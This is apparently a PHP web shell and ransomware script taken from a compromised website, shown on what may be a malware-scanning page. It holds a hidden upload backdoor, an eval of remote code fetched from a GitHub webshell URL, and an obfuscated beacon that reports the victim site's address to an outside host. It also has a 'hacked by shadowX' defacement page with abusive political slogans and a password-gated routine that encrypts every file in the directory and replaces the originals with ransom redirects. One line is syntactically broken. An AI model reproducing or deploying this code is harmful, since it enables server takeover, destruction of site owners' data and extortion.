if (isset($_GET['mrz'])) {
echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
echo '</form>';
echo '<a href="#">Hello Dady</a>';
if ($_POST['_upl'] == "Upload") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
} else {
echo '<b>Not Upload File !</b><br><br>';
}
}
exit;
}
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
chr(104) . chr(116) . chr(116) . chr(112) => array(
'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => http_build_query($d),
),
);
$c = stream_context_create($o);
function _f($u, $c) {
if (function_exists('file_get_contents')) {
$r = @file_get_contents($u, false, $c);
if ($r !== false) return $r;
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $u);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$r = curl_exec($ch);
curl_close($ch);
if ($r !== false) return $r;
}
return '';
}
$r = _f($x, $c);
echo '
<!DOCTYPE html>
<html>
<head>
<title>hacked by shadowX</title>
</head>
<body style="background:#000;margin:0;height:100vh;display:flex;flex-direction:column;align-items:center;justify-content:center;position:relative">
<img src="https://static.vecteezy.com/system/resources/thumbnails/039/000/595/large/kurdistan-waving-flag-realistic-flag-animation-seamless-loop-background-free-video.jpg"
style="position:absolute;top:20px;left:20px;width:220px;height:165px;border:3px solid #333;border-radius:8px;box-shadow:0 0 15px rgba(255,0,0,0.7)">
<img src="https://i.ibb.co/zHQPkPPD/file-0000000086a471f583cd9072dece31a1-1.png"
style="position:absolute;top:20px;right:20px;width:220px;height:220px;border-radius:150%;border:3px solid #0f0;box-shadow:0 0 15px rgba(0,255,0,0.7)">
<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT4cyZpZEXYgkCTs5Oy8eWhfg08g-q9zp7e_MRz_iyNsGUAi8PabW31IcR_&s=10"
style="width:550px;height:550px;object-fit:cover;border-radius:10px;border:3px solid #333;box-shadow:0 0 20px rgba(0,0,0,0.9)">
<h1 style="color:#0f0;font-family:monospace;font-size:32px;margin:25px 0;letter-spacing:2px;text-shadow:0 0 10px rgba(0,255,0,0.5)">H̴a̴c̴k̴e̴d̴ ̴b̴y̴ ̴s̴h̴a̴d̴o̴w̴X̴</h1>
<div style="background:#111;color:#f00;padding:15px;margin:20px 0;border:2px solid #f00;border-radius:8px;font-family:monospace;font-size:24px;text-align:center;width:500px;line-height:1.6;box-shadow:0 0 15px rgba(255,0,0,0.4)">
<div style="font-size:35%; color:#ff0; text-align:center;">
<h1>save rojava- free rojava fuck usa fuck turkey</h1>
<a href="https://t.me/Pharaohs_n"
style="color:#0f0;text-decoration:none;font-size:18px;padding:12px 30px;border:2px solid #0f0;border-radius:6px;margin-top:20px;transition:all 0.3s"
onmouseover="this.style.background=\'rgba(0,255,0,0.2)\';this.style.boxShadow=\'0 0 20px rgba(0,255,0,0.8)\';this.style.transform=\'scale(1.05)\'"
onmouseout="this.style.background=\'transparent\';this.style.boxShadow=\'none\';this.style.transform=\'scale(1)\'"
target="_blank">TELEGRAM CHANNEL</a>
</body>
</html>
';
ini_set('memory_limit', '-1');
set_time_limit(0);
error_reporting(0);
$cfg = ['cipher' => "aes-256-ctr", 'ext' => ".ultra"];
$stored_hash = '$argon2id$v=19$m=65536,t=4,p=1$T1RiOEc2aGdNYnQueW54bg$NMAYHEnGC+PXxW+ZUah+a02SaGTaiFpTw/v88qzJkBo';
$logFile = __DIR__ . "/processed_files.log";
function mainKey($password) {
return substr(hash("sha512", $password, true), 0, 32);
}
function logKey($password) {
return substr(hash("sha512", "LOG-" . $password, true), 0, 32);
}
function hmacKey($password) {
return substr(hash("sha512", "HMAC-" . $password, true), 0, 32);
}
function saveLog($files, $logFile, $password) {
if (empty($files)) return;
$key = logKey($password);
$hkey = hmacKey($password);
$iv = random_bytes(16);
$data = json_encode($files);
$enc = openssl_encrypt($data, "aes-256-ctr", $key, OPENSSL_RAW_DATA, $iv);
$hmac = hash_hmac("sha256", $iv . $enc, $hkey, true);
file_put_contents($logFile, base64_encode($iv . $hmac . $enc) . PHP_EOL, FILE_APPEND);
}
function replaceContent($file) {
$ext = pathinfo($file, PATHINFO_EXTENSION);
if ($ext === "php") {
file_put_contents($file, "header('Location: ransom.html'); exit;");
} elseif ($ext === "html" || $ext === "htm") {
file_put_contents($file, '<meta http-equiv="refresh" content="0;url=ransom.html">');
} else {
file_put_contents($file, "hacked by shadowX All your files have been encrypted. Contact: @phteam_s");
}
}
function processFile($file, $mode, $password, &$processedFiles, $cfg) {
$key = mainKey($password);
if ($mode === "encrypt") {
if (substr($file, -strlen($cfg['ext'])) === $cfg['ext']) return;
$data = @file_get_contents($file);
if ($data === false) return;
$iv = random_bytes(16);
$enc = openssl_encrypt($data, $cfg['cipher'], $key, OPENSSL_RAW_DATA, $iv);
if ($enc !== false) {
$hmac = hash_hmac("sha256", $iv . $enc, $key, true);
file_put_contents($file . $cfg['ext'], $iv . $hmac . $enc);
replaceContent($file);
$processedFiles[] = $file;
}
} elseif ($mode === "decrypt") {
if (substr($file, -strlen($cfg['ext'])) !== $cfg['ext']) return;
$raw = file_get_contents($file);
if (strlen($raw) < 48) return;
$iv = substr($raw, 0, 16);
$hmac = substr($raw, 16, 32);
$enc = substr($raw, 48);
$calc = hash_hmac("sha256", $iv . $enc, $key, true);
if (!hash_equals($hmac, $calc)) return;
$dec = openssl_decrypt($enc, $cfg['cipher'], $key, OPENSSL_RAW_DATA, $iv);
if ($dec !== false) {
$out = substr($file, 0, -strlen($cfg['ext']));
file_put_contents($out, $dec);
unlink($file);
$processedFiles[] = $out;
}
}
}
function scanAndProcess($dir, $mode, $password, &$processedFiles, $cfg) {
$items = scandir($dir);
foreach ($items as $item) {
if ($item === || $item === "..") continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (in_array($item, ['index.php','cmd.php','index.html','access_log.txt','processed_files.log','ransom.html','.htaccess'])) continue;
if (is_dir($path)) {
scanAndProcess($path, $mode, $password, $processedFiles, $cfg);
} else {
processFile($path, $mode, $password, $processedFiles, $cfg);
}
}
}
$processedFiles = [];
$msg = "";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$input = $_POST['password'] ?? '';
$mode = $_POST['mode'] ?? '';
if (password_verify($input, $stored_hash)) {
if (in_array($mode, ['encrypt', 'decrypt'])) {
scanAndProcess(__DIR__, $mode, $input, $processedFiles, $cfg);
saveLog($processedFiles, $logFile, $input);
header("Location: ransom.html");
exit;
}
} else {
$msg = "Wrong password.";
}
}
echo '
<form method="POST">
<input type="password" name="password" placeholder="Enter password" required><br>
<input type="submit" name="mode" value="encrypt">
<input type="submit" name="mode" value="decrypt">
</form>
</body>
</html>';© 2023 Quttera Ltd. All rights reserved.